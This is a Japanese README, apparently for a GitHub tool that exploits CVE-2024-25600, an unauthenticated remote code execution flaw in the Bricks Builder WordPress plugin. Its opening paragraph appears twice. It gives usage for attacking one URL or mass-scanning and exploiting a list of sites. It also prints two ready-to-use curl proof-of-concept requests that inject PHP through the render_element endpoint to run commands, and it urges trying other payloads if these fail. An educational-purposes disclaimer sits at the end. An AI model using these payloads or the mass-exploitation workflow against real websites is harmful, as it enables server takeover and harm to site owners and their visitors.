
このツールは、WordPress用Bricks Builderプラグインで見つかったCVE-2024-25600の脆弱性を悪用するために設計されています。この脆弱性により、影響を受けるウェブサイト上で未認証のリモートコード実行が可能になります。このツールは、nonceを取得し、特別に細工されたリクエストを送信して任意のコマンドを実行することで、悪用プロセスを自動化します。
このツール 🛠️ は、WordPress 用の Bricks Builder プラグインに存在する CVE-2024-25600 の脆弱性 🕳️ を悪用するために設計されています。この脆弱性により、影響を受けるウェブサイト 💻 では、認証なしでリモートからコードが実行される可能性があります。このツールは、nonce を取得し、特別に細工したリクエストを送信して任意のコマンドを実行することで、悪用プロセスを自動化します。
git clone を使用して、このリポジトリをローカルマシン 🖥️ にクローンします。pip install -r requirements.txt を使用して、必要な Python ライブラリをインストールします。python exploit.py -u <URL> でツールを実行して、インタラクティブモードを開始します。python exploit.py -l <file_path> でツールを実行して、リストされたサイトをスキャンして悪用します。開示で提供された基本 PoC は次のとおりです:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
更新: 2 つ目の PoC (より信頼性が高い)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
追加のペイロードを使用すると、より良い結果が得られる可能性があります。私のエクスプロイトや概念実証が機能しない場合は、より効果的な解決策を見つけるために、代替ペイロードを試してみることをお勧めします。
[HOST] をターゲットウェブサイトに、[NONCE] をサイトから取得した nonce 値に置き換えてください。
CVE-2024-25600 の脆弱性の詳細については、Snicco.io の詳細な開示を参照してください。
この README で提供される情報は、教育目的のみを対象としています。ウェブサイトやネットワークへの不正なハッキングは、違法かつ非倫理的です。🚫
この脆弱性を発見して報告し、コミュニティにウェブアプリケーションのセキュリティ強化に役立つ情報とツールを提供してくれたセキュリティ研究者に敬意を表します。